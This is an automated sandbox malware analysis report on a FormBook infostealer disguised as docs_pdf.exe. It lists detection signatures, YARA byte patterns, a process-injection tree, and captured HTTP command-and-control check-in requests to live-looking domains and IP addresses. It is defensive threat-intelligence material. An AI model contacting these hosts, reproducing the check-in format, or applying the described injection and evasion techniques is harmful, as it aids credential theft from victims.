Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
docs_pdf.exe

Overview

General Information

Sample name:docs_pdf.exe
Analysis ID:1472519
MD5:4a7d2fd983aa91d5d3b7bec3c430a825
SHA1:34d5c4c7e639a9cd89dc857dc2322f3a86962a3e
SHA256:b193b97622b50825390d67d4bc9ae41c2da72c2c7f2beeb3b9fb0666fe892ae1
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • docs_pdf.exe (PID: 2644 cmdline: "C:\Users\user\Desktop\docs_pdf.exe" MD5: 4A7D2FD983AA91D5D3B7BEC3C430A825)
    • svchost.exe (PID: 5672 cmdline: "C:\Users\user\Desktop\docs_pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • HDtHilbfKZE.exe (PID: 4544 cmdline: "C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • isoburn.exe (PID: 4932 cmdline: "C:\Windows\SysWOW64\isoburn.exe" MD5: BF19DD525C7D23CAFC086E9CCB9C06C6)
          • HDtHilbfKZE.exe (PID: 5396 cmdline: "C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5308 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.4549278763.0000000000800000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.4549278763.0000000000800000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2acb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x141bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.2491417008.0000000003680000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2491417008.0000000003680000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2acb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x141bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.2491132736.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d963:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16e72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e763:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17c72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\docs_pdf.exe", CommandLine: "C:\Users\user\Desktop\docs_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\docs_pdf.exe", ParentImage: C:\Users\user\Desktop\docs_pdf.exe, ParentProcessId: 2644, ParentProcessName: docs_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\docs_pdf.exe", ProcessId: 5672, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\docs_pdf.exe", CommandLine: "C:\Users\user\Desktop\docs_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\docs_pdf.exe", ParentImage: C:\Users\user\Desktop\docs_pdf.exe, ParentProcessId: 2644, ParentProcessName: docs_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\docs_pdf.exe", ProcessId: 5672, ProcessName: svchost.exe

            Snort Signatures

            Timestamp:07/13/24-00:03:27.012872
            SID:2855465
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:03:53.802060
            SID:2855465
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:04:33.327718
            SID:2855465
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:02:48.729631
            SID:2855465
            Source Port:49718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:05:54.908226
            SID:2855465
            Source Port:49776
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:05:28.251797
            SID:2855465
            Source Port:49768
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:03:40.530049
            SID:2855465
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:04:46.484649
            SID:2855465
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:03:13.390597
            SID:2855465
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:05:00.043647
            SID:2855465
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:04:06.889781
            SID:2855465
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:05:14.257772
            SID:2855465
            Source Port:49763
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:05:41.372349
            SID:2855465
            Source Port:49772
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:04:20.054098
            SID:2855465
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: docs_pdf.exeReversingLabs: Detection: 65%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4549278763.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2491417008.0000000003680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2491132736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4553969990.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4549521621.0000000000AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4549572273.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4551015645.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2492038976.0000000004550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: docs_pdf.exeJoe Sandbox ML: detected
            Source: docs_pdf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: isoburn.pdb source: svchost.exe, 00000002.00000003.2460271834.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460332566.0000000003034000.00000004.00000020.00020000.00000000.sdmp, HDtHilbfKZE.exe, 00000004.00000003.2430278443.000000000104B000.00000004.00000020.00020000.00000000.sdmp, HDtHilbfKZE.exe, 00000004.00000002.4550345852.0000000001064000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdbGCTL source: svchost.exe, 00000002.00000003.2460271834.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460332566.0000000003034000.00000004.00000020.00020000.00000000.sdmp, HDtHilbfKZE.exe, 00000004.00000003.2430278443.000000000104B000.00000004.00000020.00020000.00000000.sdmp, HDtHilbfKZE.exe, 00000004.00000002.4550345852.0000000001064000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HDtHilbfKZE.exe, 00000004.00000000.2413958648.000000000008E000.00000002.00000001.01000000.00000005.sdmp, HDtHilbfKZE.exe, 00000007.00000000.2554531949.000000000008E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: docs_pdf.exe, 00000000.00000003.2097373194.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, docs_pdf.exe, 00000000.00000003.2103113163.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2491458027.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2491458027.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2403405622.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2401985926.0000000003300000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4551471544.00000000049CE000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2493801369.0000000004684000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2491393754.00000000044D9000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4551471544.0000000004830000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: docs_pdf.exe, 00000000.00000003.2097373194.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, docs_pdf.exe, 00000000.00000003.2103113163.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2491458027.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2491458027.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2403405622.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2401985926.0000000003300000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000005.00000002.4551471544.00000000049CE000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2493801369.0000000004684000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2491393754.00000000044D9000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4551471544.0000000004830000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: isoburn.exe, 00000005.00000002.4549871592.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4553311671.0000000004E5C000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000000.2555156693.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2774571608.0000000038CBC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: isoburn.exe, 00000005.00000002.4549871592.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4553311671.0000000004E5C000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000000.2555156693.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2774571608.0000000038CBC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00154696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00154696
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0015C93C FindFirstFileW,FindClose,0_2_0015C93C
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0015C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0015C9C7
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0015F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0015F200
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0015F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0015F35D
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0015F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0015F65E
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00153A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00153A2B
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00153D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00153D4E
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0015BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0015BF27
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0081BF20 FindFirstFileW,FindNextFileW,FindClose,5_2_0081BF20
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then xor eax, eax5_2_00809790
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then mov ebx, 00000004h5_2_0468053E

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49718 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49724 -> 162.43.105.95:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49728 -> 37.9.175.173:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49734 -> 203.161.41.207:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49738 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49743 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49747 -> 51.89.93.192:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49751 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49755 -> 188.114.96.3:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49759 -> 45.130.41.38:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49763 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49768 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49772 -> 103.176.91.154:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49776 -> 5.78.41.174:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.hectmalt.xyz
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewASN Name: PARSONLINETehran-IRANIR PARSONLINETehran-IRANIR
            Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
            Source: Joe Sandbox ViewASN Name: CYBERTRAILSUS CYBERTRAILSUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: WEBSUPPORT-SRO-SK-ASSK WEBSUPPORT-SRO-SK-ASSK
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_001625E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_001625E2
            Source: global trafficHTTP traffic detected: GET /b58q/?D0Pts04=9y3r5r666D9AuSqeHTwPloJpY6P8Smz3EkVcUHvxQ2YtNmYEvcMAxsdD5dSUMIh6vRZbYKiLrFXGiCp3Pe2iajC50awG1CYTeWFE8FX2P+KAxyDMNwoJDu19IBdamGeoAx/bn7Y=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.yexz60.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficHTTP traffic detected: GET /5mht/?D0Pts04=Z08L+geXOaCZa14sbeCJfO+ty3TNCWizhbeG/u0IqvbIpSo6wwwncoz4Fc07Z+7/YVsNS4spfMpi37Q9hxoWZDkaSJlwmX6Cm2C8jVF4FHpqAh5dp062dcYDJG78WF4slIEKgCc=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.sodnavisystem.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficHTTP traffic detected: GET /9v4b/?D0Pts04=QwF7JlY1PSjHVra+4y9GAkGIkNjMkM0Pe3Kcc1HOimPCQG1R1SgxoF7twkiq9lSaXC7xRVtY7bcnqH/14lNeqyWzLUYbSscBa/GhZ/wr7EAZrjTVHikp9QpcnDnmqECCiEdhejU=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.gymroom.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficHTTP traffic detected: GET /9ntw/?D0Pts04=DF4c4jTIr0uCfSFE8clupTbEYGiU8fGq77V3jsF9odELuFK4p5vQm2AEcbSTGQxVKs+ZCGJ5ndNcuFNuj9dUFu4scKZ8BqW+NctVnA+PUwBNu7O6tttncLZAbI+QrUa9UBZ9fN0=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.hectmalt.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficHTTP traffic detected: GET /8td2/?D0Pts04=R87owMDlv/gPXB+iq45ci8jcRs8w9bUHCip7gwiELZtoK5wmHa4V63W4EgL8mNHmSVNhYgFtu0cZU8wp9zZh37Cle+WNtKYmdywkjd6RPj5YVKUfFF1M9RdoQRU10akAvSvrp68=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.atlpicsstudios.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficHTTP traffic detected: GET /euu6/?D0Pts04=IRrESbehp9A4c0arrNhB2SQGHqYh5p2Ry9/8PtMUjfb6CsHcfdyH5ffjriDVQd7StG/Sopj8DEdssgOk9jRaqOeuB2qzCVXsHxIBR/Jt3DgaUXnoWNbvMCXYX6xoy7VuQx0h7Vc=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.bearclaw.botAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficHTTP traffic detected: GET /wlsq/?D0Pts04=9G9JaQreu1q7pVWdntSqemfrZt4YMEwdEWH52d0+9tQM8/+noicIREkWd/c/vCZ1acCjjeuAo42rGPHTfjnYxH4zd6/SeR7TYZgVkfp3oOFdRtlOKMiyqIOaPcilhWS9JI76xLs=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.noghteyab.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficHTTP traffic detected: GET /22y6/?D0Pts04=ICuY/wpnSFLYWqZfe4Os/gHcG43vkkyt4BwQQiH2zV3f9F/XRNyagXQgakBjN0QcNA+3ga87AEREzxLt9aLMOqMkXFbmJEqSPlZqGaa0hprb88Yx6Msm+f4viNx2oGL3e10rb/0=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.mcpcrecycling.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficHTTP traffic detected: GET /fwdd/?D0Pts04=K/pqHoAOWNF4P+w85wWHM/iowpzI4zdOarJgSNepE9X9MW/JWlOOpIGlAtDTMDCyfqCkO2QB+3/EX24VIjMTM8AeJPJZyoLpuu1Q/5znf4Q/4KQ0LClPCb/j5/YCrPSLvGMpclo=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.evoolihubs.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficHTTP traffic detected: GET /8rqd/?D0Pts04=9oZ/y9WNG6tRMVJyjLEcdS0HrpeSaX9AmXAuzSAQ4FjvmAKqYk+BgRtg4p2v1sV9pfbK4NMIa5tejy6Eex1rgQRDwh5vDRupVU05UePYOPUqHSHA96iOT4nNXuXT/C+t5WN5HjI=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.shaf-kupe-msk.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
